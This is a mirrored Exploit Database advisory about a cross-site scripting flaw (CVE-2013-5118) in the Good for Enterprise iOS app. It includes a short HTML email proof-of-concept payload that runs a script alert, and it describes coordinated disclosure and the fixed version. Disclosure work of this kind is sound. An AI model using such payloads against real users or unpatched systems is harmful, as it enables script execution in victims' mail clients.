Good for Enterprise 2.2.2.1611 – Cross-Site Scripting

Exploit Database
39 阅读

作者： Mario

日期： 2013-09-25
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/28555/

The vulnerable versions are v2.2.2.1611 and earlier
 
Proof of Concept:
HTML Email including the following payload will execute Javascript statements when the victim open the email using the vulnerable version.
 
Payload:
<body>
<div>
<script>alert('XSS Here')</script>
</div>
</body>
 
Remediation:
I worked with the Good people to close the issue, I provided some guidance and feedback and agreed with them to not disclose it until they fix it.

The new release is now available:
Update the "Good for Enterprise" iOS application to 2.2.4.1659 or newer
 
References:
https://www.roblest.com/#research:CVE-2013-5118 

Can the comunity please provide feedback and comments in order to ensure the fix is working well

Many thanks

Mario

last Exploits
Good for Enterprise 2.2.2.1611 – Cross-Site Scripting的更多信息

ASP-Nuke 2.0.7 – ‘gotourl.asp’ Open Redirect：
WordPress Plugin Facebook Survey 1.0 – SQL Injection：
NeoBill 0.9-alpha – ‘language’ Local File Inclusion：
Webmin 1.973 – ‘run.cgi’ Cross-Site Request Forgery (CSRF)：
D-Link DKVM-IP8 – Cross-Site Scripting：
Codoforum 4.8.3 – Persistent Cross-Site Scripting：
Collabtive 1.1 – ‘managetimetracker.php’ SQL Injection：
GreenCMS 2.3.0603 – Cross-Site Request Forgery (Add Admin)：